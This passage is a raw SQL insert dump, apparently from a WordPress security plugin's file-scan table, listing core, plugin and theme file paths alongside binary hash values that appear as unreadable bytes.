�Ky�v�','wp-content/plugins/wordpress-seo/lib/dependency-injection/container-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[Q�v^�f���¾','�Yj���x���J��oq��!��bNgk�Y@�','',0,'?'),('\0���;f��Q�=*Ǖ�','wp-includes/js/wp-emoji.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�����׶H;�q.�','�������O��)`5g�D?5F�!����','',0,'?'),('\0��%ΥJ-�p��','wp-content/plugins/wordpress-seo/inc/class-rewrite.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')j��mWD�[�Ǹ%$E','���9��U\ZjL:���1��!��a�D���','',0,'?'),('\0�9�k5&�ٙ 7N','wp-includes/sodium_compat/src/Core32/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��43k�&t�8�p��','�j��+��JL¦�{����׹\Z��I]�ً�=�','',0,'?'),('\0�G���As�7.��.�V','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9վ�&�\n0	&�U�','�k�r\n����#O�2�Y6�e�`�f�^A}�Ǽ�tT','',0,'?'),('\0�Q8�<���}#���\Z','wp-content/plugins/wp-cerber/assets/flags/vg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o�=��j�u��x�:','�����M�\0�w��v���~|�ÖFd.�ݚa�','',0,'?'),('\0�|9��u�e���@��','wp-admin/includes/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C��5��\Z�@2_Z��','4��9?���#b5�t�D�\'4Q4�U��[c','',0,'?'),('\0�D�`�8R��ɲ%��','wp-content/plugins/wordfence/waf/wfWAFIPBlocksController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}��`i���y��','���Tܯ����19^�ջ�P\'�L�d%�k|�P؞','',0,'?'),('\0�K�%�5,�$ˣ','wp-includes/blocks/video/theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�R���~��H�{vm','&�ƅI�{���aw����[���\"m���_','',0,'?'),('\0�����,�_K�','wp-content/plugins/wp-cerber/assets/flags/ht.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��kRk\n,�\'�Say`','\Z|��%-#��-���X�[�q$XGWdW��\0�8','',0,'?'),('\0��P���KM,�9M','wp-content/plugins/wordpress-seo/src/deprecated/frontend/class-opengraph-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ޘ&W	9,�|Lz��!','~ˌ��A U0H�g�q\Z˖��xFpl!��','',0,'?'),('\0�lDd��u^��Y��','wp-admin/user/privacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�I���U{x1�A','F��u�X\0�og�:~��h��_��5��p�t�$','',0,'?'),('\0ꮂqs���x��h','wp-content/plugins/wordpress-seo/src/deprecated/admin/extension.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/��~؏�x�Tn','�K�@N:�����l�T����&�ݼ��Ce�','',0,'?'),('\0�v����ئ���ݞ','wp-includes/blocks/post-template/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]�@m�̕WA�U��7','|N��֊y�޼������$�Y���k�D`Vy','',0,'?'),('\0�K�z\n�7�����p��','wp-includes/wp-includes/js/json2.min.js',0,'�����x�}\'��-��8','�����x�}\'��-��8','?	��s�s��(q���c!~a�ж�H�\\y','',0,'?'),('\0��$�X��G-�tUƹ','wp-includes/blocks/navigation-link/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b,t��P)x禴(�','6&D�~�<&%���zU��B�s$H�[��?\n�e�','',0,'?'),('\0� $���ә\0֫','wp-includes/block-patterns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ܨlm,���&`Md',' ��U��y@��t��4�b��c���4\0��:','',0,'?'),('\rx+�U��ڜ���','wp-includes/css/dist/list-reusable-blocks/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�bi�ݴ�)[_��@','P-w��It������~ߢg��m�&�;�#~','',0,'?'),('/>����(��3�','wp-includes/blocks/verse/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y����Vq�Y�\n�','MbO<W\'8!����A��S�\r�G_n0���s�','',0,'?'),('�����HCS(�?\Z','wp-content/plugins/wp-smushit/app/assets/images/chrome-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d$�+oqt��\Z\\���o','��B��o{!��9 ��m�o(�f��e�g�','',0,'?'),('$�x�G?�E=��ߩ}','wp-content/themes/hitmag/inc/kirki/deprecated/filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H��c�E��C�%|��ϵ','��ǀ��w$����g1<�y��#&��D�8%��','',0,'?'),('NQ�\"*hz�r�w|\Z�','wp-admin/images/media-button-other.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q&T^�]BB�g\'��','��B\Z�r�F�В���Pv-^fT�,�_��i','',0,'?'),('T�\r�4�}�^a@|O','wp-content/plugins/wordpress-seo/admin/ajax/class-yoast-plugin-conflict-ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��+a>���]���','���J��2~ݖi�u�{����\\�N]����','',0,'?'),('Vl�K����P%A��F','wp-includes/wp-includes/comment.php',0,'�A���]�ř3F8rȃ','�A���]�ř3F8rȃ','\'B�6E�:��bw=�#u�\0��>	&���M�','',0,'?'),('X�ɘy_�7�XN/','wp-content/plugins/wordfence/views/scanner/issue-diskSpace.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\h����\'\n䷺',' �7��RG�$/����-i��Nm(�W�;̅','',0,'?'),('Y��k�0���[\\�$�','wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/core/eventdispatcher.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Jt\'k.�v���5','ޮ�����:*�mw. �R�xH��vM����','',0,'?'),(']��j��R���X','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AddressNotFoundException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��//R�����j���.','��3\'�X\r�o�`/��D����/�3\Z','',0,'?'),('nc�\Z��kG`LG��d','wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/modules/google/fontapiparser.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h]��%9�(�_�E','��L�Y�?N�@��(�j�,����A�|�c�','',0,'?'),('}K&�(t�-0W�Of�e','wp-content/plugins/all-in-one-wp-security-and-firewall/images/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('��$��U�d9�nW9','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-object-fit.min.js',0,'?с;��9�A����t�\n','?с;��9�A����t�\n','�k���O�{d��PS���\0M�\"B]�\"�E��','',0,'?'),('�T�h���zP��r�','wp-admin/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z���*N��p=���2�','|��\n�2��U�)j+���oL�	�)���o�','',0,'?'),('�ϋД\'Ot�ʗM;','wp-includes/js/dist/deprecated.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E0��M���qbb#','ѽ��]w�uyGB�Q�8�����U��Y�L���','',0,'?'),('�u�9���5�EzV9','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Exception/GuzzleException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(I�\'\\�bn�@���S','���@�M[�{p���w2��{���؈�\n��','',0,'?'),('�Qk�ԃ�Q3��%��','wp-includes/wp-includes/js/tinymce/skins/wordpress/images/embedded.png',0,'����p�N��y~�n\"','����p�N��y~�n\"','�{��u�x�\'����J�º@i\"H;�]6h','',0,'?'),('���$mdL�3����','wp-content/plugins/insert-headers-and-footers/views/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ۋ�<���T�|�','�/襱�z@e#�E������㱼joD�JS�','',0,'?'),('�X|_��wc�:�j��','wp-includes/blocks/search/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�UB��@�G�7�','��$�\0��_�{RB.�-���}$\"V����R','',0,'?'),('��E?tB9b��vF`1','wp-content/plugins/wordfence/modules/login-security/img/loading_background.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�2��p\nK�X��','�Ύ%X�ŖF�����1s�;��L�zr璻','',0,'?'),('닭�N��{=��;_�','wp-content/plugins/wordpress-seo/admin/roles/class-abstract-role-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����-\'\n�P�iw�?','���$-]�(nhzdDž3��pt���Xl�s�','',0,'?'),('���\Z\\��p�i��M','wp-content/plugins/all-in-one-wp-security-and-firewall/vendor/composer/autoload_real.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','μ�Y��,�<9ڰ*\\�0','�� �\n��GR��r\n}	>�ls��#�O)]���','',0,'?'),('�Ͻ�F�ٷI=[��s','wp-content/plugins/wordpress-seo/admin/class-admin-recommended-replace-vars.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z�_��9��eB�','\\DoC�Uޚ� }�qۃ�Sϛuh�2Im','',0,'?'),('��5J[A)=�����\r','wp-content/plugins/wordfence/js/wfi18n.1647958122.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i&XDE���p/N�','GU	��*��k�P,�:�?+}x�Hb�5���#�','',0,'?'),('��f�i7��&˗�','wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9Q�ǎ���?�Bȿ ','<>��;�8�x���J��L��]#:��= M��m���','',0,'?'),('�aB R����X�','wp-includes/wp-includes/js/wp-auth-check.js',0,'j{�,��ݍ�][c','j{�,��ݍ�][c','�R)C�`p��	ъ ���;(�Ltcn�zƈ��','',0,'?'),(';zp�ʃ��E�#�','wp-includes/wp-includes/customize/class-wp-customize-background-image-control.php',0,'�{f�&��E\\$�sX�','�{f�&��E\\$�sX�','R�v3����~������|.O�L�t�N`Ѯ��','',0,'?'),('��\\�|L�h�2�w�','wp-content/plugins/wordpress-seo/js/dist/externals/redux.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b+I=�zI�|]�Z�NP�','��ײ��]U}D~�;�����{tE�kva�','',0,'?'),('<\0$�М?��-8U\0','wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-author-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(&��a@D$Jyg��a�','����j:�=�m5.b̥��sy���m�C','',0,'?'),('t]�ٟu��u��j�','wp-admin/images/menu-vs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q���L�,_�;1/�E�','G�iH|��)��E;��\"_�;ԣ4Իw�ly�','',0,'?'),('��~�w`�5;F㮮','wp-includes/js/jquery/ui/effect-size.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���_y���vV\0�!�','���������j`���燾~�2G\\c��:��','',0,'?'),('�=��q�\rljA+','wp-admin/user/user-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<D\0�\n#���E����','X�x�no�{\0���\\��䞿��e[��jZN','',0,'?'),('ST&H���̝���','wp-content/plugins/wp-smushit/core/class-cli.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}�;��X�D-v�l','�E�}�m�^Mͫ����H�q[v&�m','',0,'?'),('\'�5�ur߲���m','wp-content/plugins/wp-cerber/cerber-whois.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#�v�T��&�9�','�J\r��X�\r�8,��oH\Z+��e�e~�t�#�','',0,'?'),('*&5,qV׷0v�c','wp-includes/blocks/post-template/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��򢒾y�NSFu`�','~�-v6%i2���@���}��f\0�k�=','',0,'?'),('/J=ۻf���;���','wp-content/plugins/wp-smushit/app/views/meta-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}f�B�9C)z�1���','�{(J���jRk��%EAGz�.6�B�hEd','',0,'?'),(';f��\Z�=�sk�O','wp-content/plugins/wordpress-seo/js/dist/languages/fa.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+|F��p{̛4��\"','gE���y��+�&�#i�?���<���a','',0,'?'),('<)8T*.�SuS�ĺ�','wp-includes/SimplePie/Cache/MySQL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�) ��fz���C�0�','	��W��A��2Lh�`���i�%iv�2���޴','',0,'?'),('HC���!���\"(�','wp-includes/js/tinymce/plugins/compat3x/css/dialog.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�wyB���o�|��','��o��Jj$��sc��R��Q��c��伍F��','',0,'?'),('J�\rӷG>�����','wp-includes/class-walker-page-dropdown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3��_]������j',',tS;�\"��V�Y)^b����OɄx,�-�8�A�','',0,'?'),('V���F|j/� c','wp-content/plugins/wordpress-seo/lib/migrations/migration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.0\'�vyȯ\nS-�?�','�.�ݴ�d<jLy�pw��ùRϳ2�(� X�\0�','',0,'?'),('u��s��y6\'v,��=','wp-includes/js/tinymce/plugins/wordpress/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q�����*x@��ד','h]��ŭG�B�4ר?,0y�_���l|','',0,'?'),('�\"�qUy���9�%Q�','wp-includes/class-wp-matchesmapregex.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+2��ai�5�R�-','���e�K��cn͆W�\nf�ڈ]����E0�j6','',0,'?'),('����mx�u�)�y�\"','wp-includes/wp-includes/js/dist/vendor/moment.js',0,'�\nt�|�\'3�� 0���','�\nt�|�\'3�� 0���','\rL�G��6���q	��\\�-���P�I���','',0,'?'),('��*�����l	�	�8�','wp-includes/wp-includes/js/codemirror/fakejshint.js',0,'5�v�,ROlx]J\')K','5�v�,ROlx]J\')K','��-�6�$$�;���}ptO�4]2��ТR�5֡','',0,'?'),('�W-�	<������','wp-content/plugins/wordpress-seo/js/dist/languages/default.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M]\\�i���~�','U\Z�5,Oa� ���T:l�\n[X\0����','',0,'?'),('� ����K i�D��t','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Zz�#H��','n]��x�������\Z_Ѫk�B�-a�&�̃','',0,'?'),('ҩ\Z����q�����(','wp-content/plugins/wordpress-seo/src/config/badge-group-names.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�Yg��ryGO\0Ȳ','�^uR[�%���� {��ރRq�s\"��(','',0,'?'),('�V�I��0�p�&���','wp-content/plugins/wordpress-seo/admin/menu/class-submenu-capability-normalize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���u�	�|�$��=N','�L��O-~;��#�{uTF�Nue�3\"xw�K','',0,'?'),('����7�&��Ȁ','wp-includes/js/tinymce/skins/lightgray/content.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\PI�ɥ��<\\��',')�Y@�u&�Kg��\0?���\\F\'�X0�Lj�','',0,'?'),('��*(��*�+�Wj�cp','wp-content/plugins/wordfence/crypto/vendor/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3Կ:�V�	��U\'','���|<���P*tg�3�dYs��/������','',0,'?'),('������9b�Jq�','wp-content/plugins/wordpress-seo/vendor_prefixed/chillerlan/php-qrcode/src/Helpers/Polynomial.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f���X�TN�}��','��<i����f�e��DK\0��Wr7q���','',0,'?'),('�85\\R��qo�-���=','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/WebServiceException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h����$x /�����','�<b��ob����nA���E���7_��GK','',0,'?'),('��0r�H\"�YK]T�','wp-admin/css/site-icon-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����L�DR��*�','Yin>j�#�K�N%8TP����O_���,','',0,'?'),('����ɮ\0�?i���u','wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/interface-wpseo-graph-piece.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RW�U�x��N�չ�e','���\r�\0a9��ܐ��\Z�<�2�G)*.~','',0,'?'),('\0[��2�q|���','wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-seo-framework.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z�X��D�Ĵu׷','�+�N� =��B`PT_*�˥�G&��ܼ�懠�j','',0,'?'),('!�[�ذ��\n�g\'','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/RejectionException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xaU���\"��6�','�����sl0&��S8���;g\0�O)7XDž�k','',0,'?'),('�ޟ���k��\0 �s','wp-content/plugins/wp-smushit/app/assets/images/icons.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��*Ȳ>$�+�,\"bk�','9rc>7Ya����g��v �˫T�<濾��hC!','',0,'?'),('�im���\Zh<B�X','wp-content/plugins/wordpress-seo/packages/js/images/yoast_loading_spinner.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F=B��Is$�\'8�','B�]�q�\\��;$�vm���7�V˄{J19��B','',0,'?'),('(�9l1��5nq���','wp-includes/blocks/button/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kJe9=���ҔJb��p','���ח�*�(�:e4_b�rA��f҃y����','',0,'?'),('(���љ����\0H<_','wp-admin/includes/nav-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��}&�6	z�\"w]�','ҷ�^��B��x����@\n�N[���8,8���n�','',0,'?'),('-�c��U�H;Ԓ��','wp-content/plugins/redirection/locale/redirection-es_MX.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7[�4��%���q�s','�Vm�Ee�f��[��\0G�2��ni6)�j','',0,'?'),('3x2�§��h�_','wp-includes/blocks/shortcode/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ͻ�0E���<��#�','I�D�W�=�~7�����(���3E���b$@x`�','',0,'?'),(':����{��!W�U�','wp-includes/wp-includes/sodium_compat/src/Crypto32.php',0,'I\r}j�NJQX]m��','I\r}j�NJQX]m��','ɱ��䱃Fn����2c.n�M��ڣ� A���','',0,'?'),('<.��4�v��c�\"`�t','wp-includes/class-wp-simplepie-sanitize-kses.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/}�\Z�_a��Ml���','P�,\ZM�A��qQmq;�-�H��q<APUNjP#','',0,'?'),('Ek�(u�!���QU^�','wp-content/plugins/wordpress-seo/src/conditionals/admin/licenses-page-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�r+�U��в�̋��','���a�\0�K����w6\'n�I�\".4����@�','',0,'?'),('`b�wh�v��@7��','wp-content/plugins/wp-cerber/assets/flags/fk.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z��J����r��C��',';\r�:$�<���t�o5�G�%�&s�Ίҕ','',0,'?'),('i�PÙ��ld\0��','wp-includes/css/jquery-ui-dialog.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�G�-_f���kqT�','v�4�8p�nf��Z�H\"ռ\\�;j�R&N�','',0,'?'),('k�4c����5<\"','wp-includes/js/dist/autop.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@O�_G�Я\Z\r]Z�H','��M,�j�a�q��\"�ys���W4�z֡���C?','',0,'?'),('��n�\r�����i^','wp-content/plugins/wordpress-seo/src/integrations/third-party/wincher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�B ��>�t`, U�}X','z��ĄZb�D�O,cmE�a�!�nR(�z��','',0,'?'),('��7.�\'���oN�','wp-includes/wp-includes/js/mediaelement/mediaelementplayer.css',0,'�1�ĪL��5��!\n�','�1�ĪL��5��!\n�','o��^:v\\���m���o����cTW[���k','',0,'?'),('�uAm����s�,)DEv','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/container/src/ContainerExceptionInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bf�y����y�','�Q���YpC�=�3�;�u����N���K���oՄ','',0,'?'),('��N����Y�H»	��','wp-includes/wp-includes/js/tinymce/plugins/wptextpattern/plugin.min.js',0,'�#�R?�\"�`�$�`','�#�R?�\"�`�$�`','!	�n�‚�śU7B��5gr�	1�*;R�','',0,'?'),('�0��Y%�@�X�ʉ�','wp-includes/wp-includes/js/tinymce/plugins/wpeditimage/plugin.min.js',0,'�be& W����Ř�','�be& W����Ř�','Iu{W�m�bk_�����.�cx\rh+K�','',0,'?'),('��\n?&]S�8eDO','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php',0,'^�\"3R0������','^�\"3R0������','��z�m1��xJ �g�Ь�xs�sIѻ˸�2','',0,'?'),('��[V~o��d�J','wp-content/plugins/wp-smushit/core/class-stats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9����|ZzQ�','Y��0M	�!�$^����1;<�.z�w����C�','',0,'?'),('���w߇V�v��D߬�','wp-content/plugins/wp-fastest-cache/languages/wp-fastest-cache-tr_TR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q��߯�����ԎK','$*qR�e�\Z��^�\'�ݸ�TȠ���I|����e','',0,'?'),('�N�.�!A�2�5�L','wp-includes/block-supports/utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&ʉ��唚�c�2�p',')ƪ��蔸kl��O��ހd���d`��\r�랡','',0,'?'),('�D����5��','wp-includes/wp-includes/images/smilies/icon_idea.gif',0,'���<]�W3tށ�','���<]�W3tށ�','�{�2^4S����Tl���I�J�Q��\"','',0,'?'),('�x#��*W`P���D�','wp-content/plugins/wordfence/modules/login-security/views/common/revoke-grace-period.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�&��:^��!��y�','����y�ӑ4UVȡF>/��m��#�<{�r�','',0,'?'),('��9���䷳\n���6�','wp-content/plugins/wordpress-seo/admin/pages/tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dw.(���{I�tP�Z\"','[c�����E��X�\"�~�.�Ḅ]�&���','',0,'?'),('�{��^�3����r','wp-includes/wp-includes/class-wp-widget.php',0,'F�� �B��Ի��','F�� �B��Ի��','���/�����0�=�|{h��n�R�','',0,'?'),('!���@|�4��n���','wp-includes/class-http.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���WQK\r��t�ǝh<','a�j��EXO�tf}�;g$�خ��4�4��Ѵ���','',0,'?'),('\'ڞ\0;��?�+VҪ�','wp-admin/network/edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����=��#L�H���','q�/*߲3��x�S���~�.\']w��k�,W','',0,'?'),(';pR9��+�qpծ','wp-admin/includes/options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p��;��\"�Ћ�','�YX��i4+�\r�A�S�F/\\R��~��_�','',0,'?'),('?��|꺯��~x����','wp-includes/blocks/query/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��b��n`�^��%','���M�D_7[�$B�]�\Z�U�t�{9q� �t�','',0,'?'),('B�{�)�s��\'','wp-content/plugins/wordpress-seo/admin/views/tabs/tool/wpseo-export.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2O+z�p�㓗E�?��X','[�m_-�af�����\Z�\r�{)���<Q9P�7ͦ','',0,'?'),('Z9XƵ��������','wp-content/plugins/wordpress-seo/src/deprecated/frontend/abstract-class-deprecated-schema-piece.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���FE��a:�w�j�=�','��\0�Z\"�z\r�-�vJ8���G�̒�yb','',0,'?'),('\\^G�pA!D�g�[\'','wp-content/plugins/wp-fastest-cache/languages/wp-fastest-cache-es_VE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w��=�pН��]','�U�[l�����TGv��4��\n���\'�-�','',0,'?'),('_���\0.�6�l�q�','wp-content/plugins/all-in-one-wp-security-and-firewall/logs/wp-security-log.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('dV��p�@��La','wp-includes/wp-includes/js/jquery/ui/effect-fold.min.js',0,'��&��L���R���<','��&��L���R���<','��C�]*\'�W�\"�о����V��Jq���','',0,'?'),('u\0�e&��$��O�','wp-content/plugins/wordpress-seo/admin/import/plugins/class-abstract-plugin-importer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=�f��~�C����W','�S_>[�g�9�TЊ���VPRr��r^\\r\"�*','',0,'?'),('w>�uU,���ݵE<b�','wp-content/plugins/wp-cerber/assets/flags/ch.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�E3�c�D��/ �C','�1�K:�O��1#p��?��G�r��蜸','',0,'?'),('x��m���\0�~���','wp-includes/customize/class-wp-customize-nav-menus-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�K͞�u	Q�� �p�','�/\'V\ZVtb\"���d����s\"e��@���I<','',0,'?'),('yiú\n�_Tz\\���l','wp-content/plugins/wordpress-seo/src/helpers/asset-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T\r��~4�4�<B�P�','�g1�meA���@�?u��v�6��ha���\0�','',0,'?'),('~)�zL�� T\0�','wp-content/plugins/redirection/matches/url.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�(�(!������','��GICuǶ�N!V�-��I�u��\Z���u�','',0,'?'),('�܈�y��7@����\"','wp-includes/blocks/audio/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c	’��]CC_ͤZ','Ɗ�\r���ӭNM�:L��ʚk�2�}P���\Z�','',0,'?'),('�e��N\r�Qlf��{�','wp-content/themes/hitmag/inc/kirki/modules/field-dependencies/class-kirki-modules-field-dependencies.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9��P�	� \Z�#z\nf','���s�3/��9�(q��Q��P0��؋�Y���','',0,'?'),('�I����Z�L��p','wp-includes/wp-includes/sodium_compat/src/Core32/Int64.php',0,'%m�S�,���\\�','%m�S�,���\\�','U���!�6��/�U�cq���n���@�+�','',0,'?'),('���\n�#�T��?׻��','wp-content/plugins/wordfence/views/scanner/issue-publiclyAccessible.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2W�L��;m�06��','�Є�<�EHm`^�w�I����b�����M�','',0,'?'),('�V�9��<�*\r�̬D','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/ar.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N&H�4G��\nQ%','|U¢�Zbv���\0�H�����]��X��','',0,'?'),('��� )�\n47 ,3','wp-includes/wp-includes/feed-atom.php',0,'{\r�g�\'SkI�fe�p�','{\r�g�\'SkI�fe�p�','!�I��m\nY��f+̕�P\0����13�\\=��','',0,'?'),('�Ú2��d�=','wp-includes/rest-api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,���.�mi?�','�y���JQ�-U��]�Ը����Y�qJ����','',0,'?'),('�P\0\'�0l���v�#J<','wp-includes/js/jquery/ui/effect-fold.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C��H��pg� a','�r�}���4U�$H�WX��G�$	�l�F���','',0,'?'),('Ȅ���xy����','wp-includes/js/tinymce/skins/wordpress/images/embedded.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����p�N��y~�n\"','�{��u�x�\'����J�º@i\"H;�]6h','',0,'?'),('�58L(�9 �|�n\'','wp-includes/blocks/comments/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8�ʍ 훮&�(a��','��{����uƭ��:�z�P	